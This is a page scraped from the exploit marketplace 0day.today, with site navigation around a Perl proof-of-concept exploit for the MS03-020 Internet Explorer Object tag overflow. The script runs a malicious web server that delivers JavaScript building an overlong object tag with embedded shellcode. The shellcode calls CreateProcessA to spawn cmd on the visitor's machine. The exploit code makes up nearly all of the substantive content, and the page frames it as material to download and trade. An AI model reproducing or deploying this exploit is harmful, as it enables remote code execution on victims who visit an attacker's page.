0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Internet Explorer Object Tag Exploit (MS03-020)
================================================== MS Internet Explorer Object Tag Exploit (MS03-020) ================================================== #!/usr/bin/perl # # Proof of concept exploit on IE 5.x - 6.x by Alumni # IE-Object longtype dynamic call oferflow # # url://<$shellcode><'/'x48><jmp %ptr_sh> # the flaw actually exists in URLMON.DLL when converting backslashes # to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'. # # To exploit: i) start server perl script; # ii) connect to http-service using IE/5.x. # a) the shellcode size is limited up to 56 bytes; # b) the '$ret' may differ as well as the image base of KERNEL32.DLL; # c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript. # use IO::Socket; $port = 80; $server = IO::Socket::INET->new (LocalPort => $port, Type =>SOCK_STREAM, Reuse => 1, Listen => $port) or die("Couldnt't create server socket\n"); $shellcode = "\x33\xdb". # xor ebx, ebx "\x8b\xd4". # mov edx, esp "\x80\xc6\xff". # add dh, 0xFF "\xc7\x42\xfc\x63\x6d". # mov dword ptr[edx-4], 0x01646D63 ("cmd\x01") "\x64\x01". # "\x88\x5a\xff". # mov byte ptr[edx-1], bl "\x8d\x42\xfc". # lea eax, [edx-4] "\x8b\xf5". # mov esi, ebp "\x56\x52". # push esi; push edx "\x53\x53\x53\x53\x53\x53". # push ebx "\x50\x53". # push eax; push ebx "\xb8\x41\x77\xf7\xbf". # mov eax, 0xBFF77741 ~= CreateProcessA "\xff\xd0". # call eax "\xb8\xf8\xd4\xf8\xbf". # mov eax, 0xBFF8D4F8 ~= ExitProcess "\xff\xd0". # call eax "\xcc"; # int 3 $nop = "\x90"; $ret = "\\xAB\\x5D\\x58"; while ($client = $server->accept()) { while (<$client>) { if ($_ =~ /^(\x0D\x0A)/) { print $client <<END_DATA; HTTP/1.0 200 Ok\r Content-Type: text/html\r \r <script>\r var mins = 56;\r var size = 48;\r var sploit = "$shellcode";\r var strNop = "$nop";\r var strObj = '<object type="';\r for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r strObj += sploit;\r for (i=0;i<size;i++) strObj += '/';\r strObj += "CCCCCCCCDDDDDDDD";\r strObj += "$ret";\r strObj += '">Hello</object>';\r alert(strObj);\r document.write(strObj);\r </script>\r END_DATA close($client); } } } close($server); # 0day.today [2024-07-08] #